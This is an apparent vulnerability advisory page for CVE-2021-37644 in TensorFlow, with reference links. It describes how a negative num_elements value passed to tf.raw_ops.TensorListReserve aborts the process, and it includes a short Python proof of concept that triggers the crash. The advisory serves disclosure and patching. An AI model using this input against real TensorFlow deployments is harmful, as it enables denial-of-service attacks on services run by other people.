CVE-2021-37644: `std::abort` raised from `TensorListReserve`
(updated )
Providing a negative element to num_elements list argument of tf.raw_ops.TensorListReserve causes the runtime to abort the process due to reallocating a std::vector to have a negative number of elements:
import tensorflow as tf
tf.raw_ops.TensorListReserve(
element_shape = tf.constant([1]),
num_elements=tf.constant([-1]),
element_dtype = tf.int32)
References
- github.com/advisories/GHSA-27j5-4p9v-pp67
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-cpu/PYSEC-2021-557.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow-gpu/PYSEC-2021-755.yaml
- github.com/pypa/advisory-database/tree/main/vulns/tensorflow/PYSEC-2021-266.yaml
- github.com/tensorflow/tensorflow
- github.com/tensorflow/tensorflow/commit/8a6e874437670045e6c7dc6154c7412b4a2135e2
- github.com/tensorflow/tensorflow/security/advisories/GHSA-27j5-4p9v-pp67
- nvd.nist.gov/vuln/detail/CVE-2021-37644
Code Behaviors & Features
Detect and mitigate CVE-2021-37644 with GitLab Dependency Scanning
Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →